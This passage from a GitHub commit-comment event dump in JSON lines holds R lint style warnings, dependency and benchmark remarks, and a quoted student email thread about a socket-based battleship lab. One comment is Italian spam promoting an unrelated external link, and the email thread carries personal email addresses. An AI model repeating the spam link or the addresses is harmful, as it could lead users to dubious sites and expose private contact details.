**Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/6d337e7609c34b8029f91e2a2575922f65ed0a81/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n"}},"created_at":"2016-09-18T20:12:23Z"}
{"id":"4580548809","type":"CommitCommentEvent","actor":{"login":"winkelsdorf"},"repo":{"name":"kean/Nuke-Alamofire-Plugin"},"payload":{"comment":{"id":19072110,"position":null,"line":null,"path":null,"commit_id":"09e39731c1c822161df8109fdeece43a11a4dea1","created_at":"2016-09-18T20:14:22Z","updated_at":"2016-09-18T20:14:22Z","body":"Setting Nuke dependency in Podspec currently breaks the CocoaPods use, as Nuke is not already 4.0.\r\n\r\n> \"s.dependency 'Nuke', '~> 4.0'\"\r\n\r\n```\r\npod update\r\nUpdate all pods\r\nUpdating local specs repositories\r\nAnalyzing dependencies\r\nPre-downloading: `Nuke` from `https://github.com/kean/Nuke`\r\nPre-downloading: `Nuke-Alamofire-Plugin` from `https://github.com/kean/Nuke-Alamofire-Plugin`, branch `swift3`\r\n[!] Unable to satisfy the following requirements:\r\n\r\n- `Nuke (from `https://github.com/kean/Nuke`)` required by `Podfile`\r\n- `Nuke (~> 4.0)` required by `Nuke-Alamofire-Plugin (1.0)`\r\n```"}},"created_at":"2016-09-18T20:14:22Z"}
{"id":"4580551511","type":"CommitCommentEvent","actor":{"login":"rwieruch"},"repo":{"name":"andimarek/writings_review"},"payload":{"comment":{"id":19072114,"position":10,"line":30,"path":"mobx_redux_confusion/README.md","commit_id":"8eebde96f123561ad5f9b7b53be225adc6ed3a66","created_at":"2016-09-18T20:16:08Z","updated_at":"2016-09-18T20:16:08Z","body":"Good point!"}},"created_at":"2016-09-18T20:16:08Z"}
{"id":"4580554144","type":"CommitCommentEvent","actor":{"login":"Ket4up"},"repo":{"name":"Simpey/Robinsono"},"payload":{"comment":{"id":19072118,"position":null,"line":null,"path":null,"commit_id":"65d198a56cef86d359c19e43340b04af02824670","created_at":"2016-09-18T20:17:54Z","updated_at":"2016-09-18T20:17:54Z","body":"Norm"}},"created_at":"2016-09-18T20:17:54Z"}
{"id":"4580555625","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":19072119,"position":null,"line":null,"path":null,"commit_id":"e6fc3869109c616db5030b6fd9e277a2e39ef3b5","created_at":"2016-09-18T20:18:51Z","updated_at":"2016-09-18T20:18:51Z","body":"@rkorytkowski this is usually a symptom of some other error. For instance, i frequently get this error when the moduleApplicationContext fails to load in unit tests because of exceptions like ClassNotFoundException. I have just got the same exact error now even after applying your commit. :)\r\nFull stack trace here: http://pastebin.com/rLVu6PDm"}},"created_at":"2016-09-18T20:18:51Z"}
{"id":"4580555962","type":"CommitCommentEvent","actor":{"login":"Ale1994"},"repo":{"name":"rafolo89/Esame"},"payload":{"comment":{"id":19072120,"position":null,"line":null,"path":null,"commit_id":"cf12aa200ab771dc124401db6ef7c7b7e422eb9d","created_at":"2016-09-18T20:19:04Z","updated_at":"2016-09-18T20:19:04Z","body":"Ciao amico!\r\n\r\nEcco alcuni link utili che ho scelto solo  per voi, dategli un’occhiata <http://maria.paulandmorgan.com/lyo>\r\n\r\nI miei migliori auguri, lessandra Orsi\r\n"}},"created_at":"2016-09-18T20:19:04Z"}
{"id":"4580556905","type":"CommitCommentEvent","actor":{"login":"RyanCCollins"},"repo":{"name":"OfficialPhrank/Calculator"},"payload":{"comment":{"id":19072121,"position":5,"line":5,"path":"src/App.js","commit_id":"1ae522347ee575bbe4f6730421d5bade1d8f1ecc","created_at":"2016-09-18T20:19:38Z","updated_at":"2016-09-18T20:19:38Z","body":"Horrible, just horrible!"}},"created_at":"2016-09-18T20:19:38Z"}
{"id":"4580558808","type":"CommitCommentEvent","actor":{"login":"mdorman"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19072123,"position":null,"line":null,"path":null,"commit_id":"c6460fb0cbda179b83558a6e19c13a2d5f81a5ed","created_at":"2016-09-18T20:20:46Z","updated_at":"2016-09-18T20:20:46Z","body":"Sorry, it was a crazy week at work, so I haven't been able to get back to this before now.\r\n\r\nSo I think one potential issue is that a lot of the custom packages I'm thinking of aren't in `emacs-packages.nix` at all, they're in `applications/editors/emacs-modes/<foo>` and pulled into the `emacsPackageGen` expression in `all-packages.nix`, and often under camelCase names.  So it's not just a matter of dropping them from `emacs-packages.nix`, I think we would need to maintain aliases, at least for one release?\r\n\r\nStill, if you think it's feasible to proceed by, say, dropping related groups of packages from `emacs-packages.nix` (assuming they all exist in `melpaStable` or `melpa`), I can at least work on that."}},"created_at":"2016-09-18T20:20:46Z"}
{"id":"4580559693","type":"CommitCommentEvent","actor":{"login":"jhillyerd"},"repo":{"name":"jhillyerd/inbucket"},"payload":{"comment":{"id":19072125,"position":20,"line":33,"path":"swaks-tests/run-tests.sh","commit_id":"a2e50a7be33b2c91d751906b8c84072d18c4bee3","created_at":"2016-09-18T20:21:19Z","updated_at":"2016-09-18T20:21:19Z","body":"@tommywo - I noticed after implementing this test, that we are storing the full contents of the To: header, not just the particular mailbox:\r\n\r\n```\r\n  {\r\n    \"mailbox\": \"one\",\r\n    \"id\": \"20160918T124904-0034\",\r\n    \"from\": \"james@archbox.localdomain\",\r\n    \"to\": \"one@inbucket,two@inbucket\",\r\n    \"subject\": \"Swaks Multi-Recipient\",\r\n    \"date\": \"2016-09-18T12:49:04.06494606-07:00\",\r\n    \"size\": 401\r\n  }\r\n```\r\n\r\nThis is *probably* the right thing to do, but I wanted to make sure it matched your intent.  Keep in mind it can also contain names outside of the recipient address:\r\n\r\n```\r\n  {\r\n    \"mailbox\": \"yimmy\",\r\n    \"id\": \"20160918T131855-0036\",\r\n    \"from\": \"Test User <user@localhost>\",\r\n    \"to\": \"Yimmy Inbucket <yimmy@inbucket>\",\r\n    \"subject\": \"Test Names\",\r\n    \"date\": \"2016-09-18T13:18:55.463980427-07:00\",\r\n    \"size\": 230\r\n  }\r\n```\r\n\r\nAt least we are matching the From header functionality."}},"created_at":"2016-09-18T20:21:19Z"}
{"id":"4580559793","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19072127,"position":null,"line":null,"path":null,"commit_id":"b352d0c4611ccc51eff0c643322e3bc3a9bb416f","created_at":"2016-09-18T20:21:22Z","updated_at":"2016-09-18T20:21:22Z","body":"For what it's worth, I measured a 1.3% slowdown (non-pgo build):\r\n\r\nTotal time (ms) : 148221\r\nNodes searched  : 202696778\r\nNodes/second    : 1367530\r\nmaster\r\n\r\nTotal time (ms) : 150193\r\nNodes searched  : 202696778\r\nNodes/second    : 1349575\r\ntestedpatch\r\n"}},"created_at":"2016-09-18T20:21:22Z"}
{"id":"4580560466","type":"CommitCommentEvent","actor":{"login":"adrcotfas"},"repo":{"name":"adrcotfas/Goodtime"},"payload":{"comment":{"id":19072128,"position":null,"line":null,"path":null,"commit_id":"e9cda8ce31273eb1dae60ac368217a1ba1a6e4b2","created_at":"2016-09-18T20:21:46Z","updated_at":"2016-09-18T20:21:46Z","body":"yes, it's 17."}},"created_at":"2016-09-18T20:21:46Z"}
{"id":"4580560935","type":"CommitCommentEvent","actor":{"login":"shanhaichik"},"repo":{"name":"eigenmethod/mol"},"payload":{"comment":{"id":19072129,"position":null,"line":null,"path":null,"commit_id":"d34c53ed79dafceeb1213af29e5bd0e5580796e7","created_at":"2016-09-18T20:22:08Z","updated_at":"2016-09-18T20:22:08Z","body":"Приложение, Огонь 🔥 "}},"created_at":"2016-09-18T20:22:08Z"}
{"id":"4580563729","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19072133,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T20:24:00Z","updated_at":"2016-09-18T20:24:00Z","body":"I got the file reading to the 2d array working.......kinda. There is an\nadditional element on each row of the array to hold the new line char. This\nwas the easiest without having to read a line from the text file, strip the\n/n, then change the string into chars, then put it in the array. Maybe\nlater use the numpy library to make this nicer? I just wanted to get it\nworking so we can move on and get more done. I left the variable for the\nwidth at 10 so we can still use this to check for a shot out of bounds.\n\nOn Sun, Sep 18, 2016 at 1:28 PM, David Schwehr <dpschwehr@gmail.com> wrote:\n\n> I got reading the file and filling the array to work but I can't omitt the\n> newline character. Supossedly there is a strip('/n') that should work with\n> reading a file line by line but we need to read char by char. If you were\n> able to leave out the /n than that is farther than I got.\n>\n> On Sun, Sep 18, 2016 at 1:24 PM, Emmanuel-Armstrong <\n> notifications@github.com> wrote:\n>\n>> Oh crap I just realized, I've done some work on the file reading and\n>> writing but I totally forgot to push it up to git! I'll see if I have any\n>> more than you and if so I'll push up what I have when I get home from work\n>> in a couple hours. Sorry about that!\n>>\n>>\n>> On Sep 18, 2016 12:53 PM, \"dssquared\" <notifications@github.com> wrote:\n>>\n>> > I've started working with reading in the board file and filling the\n>> array,\n>> > about half success now. Once the board array is filled we can start\n>> working\n>> > on the rest. Not sure if we want to make a nother text file for the\n>> client\n>> > to keep track of the board since the client is re-invoked each time.\n>> Can't\n>> > really use an array since the program is restarted each time but\n>> writing to\n>> > a file from an array could be a pain. I will finish the server side\n>> > creating the board array first, might use a list within a list.\n>> > What do you guys want to work on or feel comfortable about working on?\n>> >\n>> > David\n>> >\n>> > On Sat, Sep 17, 2016 at 6:35 PM, David Schwehr <dpschwehr@gmail.com>\n>> > wrote:\n>> >\n>> > > Just checked, the address for localhost is correct, the port numbers\n>> and\n>> > > ip being set from command line arguments is already implemented and I\n>> > > checked the connection already. I was going to play around with\n>> different\n>> > > ways of making the board and http stuff next. I put a board.txt file\n>> in\n>> > the\n>> > > folder too to use to test reading the file and creating an array or\n>> list\n>> > of\n>> > > lists for the board.\n>> > > Remember to git pull before working on anything to make sure you have\n>> the\n>> > > most recent version.\n>> > > I will be working on it some tonight and spending most the day on it\n>> > > tomorrow.\n>> > >\n>> > > On Sat, Sep 17, 2016 at 6:30 PM, David Schwehr <dpschwehr@gmail.com>\n>> > > wrote:\n>> > >\n>> > >> Right now the server is on 127.0.0.1( i may have the address wrong\n>> but\n>> > it\n>> > >> should be the address of localhost, which is the same no matter what\n>> > >> machine it is running on) just to run it on your local machine to\n>> test,\n>> > it\n>> > >> will be changed to the ip address of the machine it is running on\n>> when\n>> > they\n>> > >> grade it.\n>> > >>\n>> > >> On Sat, Sep 17, 2016 at 6:26 PM, David Schwehr <dpschwehr@gmail.com>\n>> > >> wrote:\n>> > >>\n>> > >>> It is getting the fire commands from the command line arguments,\n>> that\n>> > is\n>> > >>> why the client is being invoked every play. The connection is made\n>> > with the\n>> > >>> port number and IP address passed in from the command line\n>> arguments. I\n>> > >>> have already wrote the code for the connection using the socket\n>> > library.\n>> > >>> Thev ariables for the x and y coords passed from the command line\n>> are\n>> > >>> working just as you had them in your test.py, I added it to the\n>> > client.py\n>> > >>> file already. These variable will be used in the methods that send\n>> the\n>> > http\n>> > >>> message. The http and passing in the variable I think will be the\n>> easy\n>> > >>> part, some of it is done and it works. The time consuming part is\n>> > going to\n>> > >>> be writing the code to maintain the board and \"serving\" the display\n>> of\n>> > the\n>> > >>> board.\n>> > >>> Tracking sunk ships will work as you suggested and this will be put\n>> in\n>> > a\n>> > >>> method called from read_board or process_reply or done inside of\n>> > >>> process_reply.\n>> > >>>\n>> > >>> On Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <\n>> > >>> notifications@github.com> wrote:\n>> > >>>\n>> > >>>> I was thinking about tracking sunk ships. Just a thought, but what\n>> if\n>> > >>>> we had a global variable for each ship (carrier = 5), and every\n>> time\n>> > we hit\n>> > >>>> that type of ship we decrement that value, and compare it to 0. so\n>> if\n>> > >>>> carrier gets to 0 then it has been hit 5 times which is the same\n>> > thing as\n>> > >>>> being sunk.\n>> > >>>>\n>> > >>>> —\n>> > >>>> You are receiving this because you authored the thread.\n>> > >>>> Reply to this email directly, view it on GitHub\n>> > >>>> <https://github.com/dssquared/Networks_Lab1/commit/\n>> > 7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n>> > >>>> or mute the thread\n>> > >>>> <https://github.com/notifications/unsubscribe-auth/AE8DG_\n>> y6gkDXIV5_\n>> > YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n>> > >>>> .\n>> > >>>>\n>> > >>>\n>> > >>>\n>> > >>\n>> > >\n>> >\n>> > —\n>> > You are receiving this because you commented.\n>> > Reply to this email directly, view it on GitHub\n>> > <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1b\n>> a8a89d303ffa5a927903a77492af920#commitcomment-19071806>,\n>> > or mute the thread\n>> > <https://github.com/notifications/unsubscribe-auth/\n>> ANiCOS9eO_caF6oZivfhC4W6aceQXCnFks5qrYi_gaJpZM4J_dYG>\n>>\n>> > .\n>> >\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19071958>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AE8DG5F6ycythOV16iTCINZqZXSNnY3Fks5qrZAFgaJpZM4J_dYG>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-18T20:24:00Z"}
{"id":"4580564579","type":"CommitCommentEvent","actor":{"login":"ValdikSS"},"repo":{"name":"ValdikSS/openvpn-with-patches"},"payload":{"comment":{"id":19072136,"position":19,"line":6683,"path":"src/openvpn/options.c","commit_id":"3d9e613b090212ea41a94ed11c44e4e94b1e3306","created_at":"2016-09-18T20:24:32Z","updated_at":"2016-09-18T20:24:32Z","body":"Done, https://github.com/ValdikSS/openvpn-with-patches/commit/25ad257c8d4f657f01bf7638d0f15b47304d81ad"}},"created_at":"2016-09-18T20:24:32Z"}
{"id":"4580566567","type":"CommitCommentEvent","actor":{"login":"cris"},"repo":{"name":"ericdrowell/BigOCheatSheet"},"payload":{"comment":{"id":19072138,"position":null,"line":null,"path":null,"commit_id":"1193ed24fa564d00b31100cbcd86f36fa362e224","created_at":"2016-09-18T20:25:51Z","updated_at":"2016-09-18T20:25:51Z","body":"@ericdrowell\r\nWhy did you delete Graph and Heap sections?"}},"created_at":"2016-09-18T20:25:51Z"}
{"id":"4580567569","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19072140,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-18T20:26:30Z","updated_at":"2016-09-18T20:26:30Z","body":"I got some syntax errors fixed in server.py and it will run, but with the\nwhile(1) infinite loop you have to go into the task manager to kill the\nprocess since you have to run it from the command line to send in\narguments. We wont have to worry about it once the client stuff is more\ncomplete to where the client will close the connection and the server wont\nget stuck in a loop.\n\n\nOn Sun, Sep 18, 2016 at 2:23 PM, David Schwehr <dpschwehr@gmail.com> wrote:\n\n> I got the file reading to the 2d array working.......kinda. There is an\n> additional element on each row of the array to hold the new line char. This\n> was the easiest without having to read a line from the text file, strip the\n> /n, then change the string into chars, then put it in the array. Maybe\n> later use the numpy library to make this nicer? I just wanted to get it\n> working so we can move on and get more done. I left the variable for the\n> width at 10 so we can still use this to check for a shot out of bounds.\n>\n> On Sun, Sep 18, 2016 at 1:28 PM, David Schwehr <dpschwehr@gmail.com>\n> wrote:\n>\n>> I got reading the file and filling the array to work but I can't omitt\n>> the newline character. Supossedly there is a strip('/n') that should work\n>> with reading a file line by line but we need to read char by char. If you\n>> were able to leave out the /n than that is farther than I got.\n>>\n>> On Sun, Sep 18, 2016 at 1:24 PM, Emmanuel-Armstrong <\n>> notifications@github.com> wrote:\n>>\n>>> Oh crap I just realized, I've done some work on the file reading and\n>>> writing but I totally forgot to push it up to git! I'll see if I have any\n>>> more than you and if so I'll push up what I have when I get home from\n>>> work\n>>> in a couple hours. Sorry about that!\n>>>\n>>>\n>>> On Sep 18, 2016 12:53 PM, \"dssquared\" <notifications@github.com> wrote:\n>>>\n>>> > I've started working with reading in the board file and filling the\n>>> array,\n>>> > about half success now. Once the board array is filled we can start\n>>> working\n>>> > on the rest. Not sure if we want to make a nother text file for the\n>>> client\n>>> > to keep track of the board since the client is re-invoked each time.\n>>> Can't\n>>> > really use an array since the program is restarted each time but\n>>> writing to\n>>> > a file from an array could be a pain. I will finish the server side\n>>> > creating the board array first, might use a list within a list.\n>>> > What do you guys want to work on or feel comfortable about working on?\n>>> >\n>>> > David\n>>> >\n>>> > On Sat, Sep 17, 2016 at 6:35 PM, David Schwehr <dpschwehr@gmail.com>\n>>> > wrote:\n>>> >\n>>> > > Just checked, the address for localhost is correct, the port numbers\n>>> and\n>>> > > ip being set from command line arguments is already implemented and I\n>>> > > checked the connection already. I was going to play around with\n>>> different\n>>> > > ways of making the board and http stuff next. I put a board.txt file\n>>> in\n>>> > the\n>>> > > folder too to use to test reading the file and creating an array or\n>>> list\n>>> > of\n>>> > > lists for the board.\n>>> > > Remember to git pull before working on anything to make sure you\n>>> have the\n>>> > > most recent version.\n>>> > > I will be working on it some tonight and spending most the day on it\n>>> > > tomorrow.\n>>> > >\n>>> > > On Sat, Sep 17, 2016 at 6:30 PM, David Schwehr <dpschwehr@gmail.com>\n>>> > > wrote:\n>>> > >\n>>> > >> Right now the server is on 127.0.0.1( i may have the address wrong\n>>> 